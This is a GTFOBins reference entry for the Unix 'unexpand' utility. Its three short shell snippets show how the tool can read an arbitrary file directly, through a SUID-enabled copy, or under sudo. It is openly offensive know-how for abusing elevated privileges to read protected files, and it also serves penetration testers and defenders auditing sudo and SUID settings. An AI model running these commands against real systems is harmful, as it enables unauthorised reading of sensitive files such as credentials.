GTFOBins.github.io/_gtfobins/unexpand.md
2018-07-04 19:26:52 +01:00

16 lines
287 B
Markdown

---
functions:
file-read:
- code: |
LFILE=file_to_read
unexpand -t99999999 "$LFILE"
suid-enabled:
- code: |
LFILE=file_to_read
./unexpand -t99999999 "$LFILE"
sudo-enabled:
- code: |
LFILE=file_to_read
sudo unexpand -t99999999 "$LFILE"
---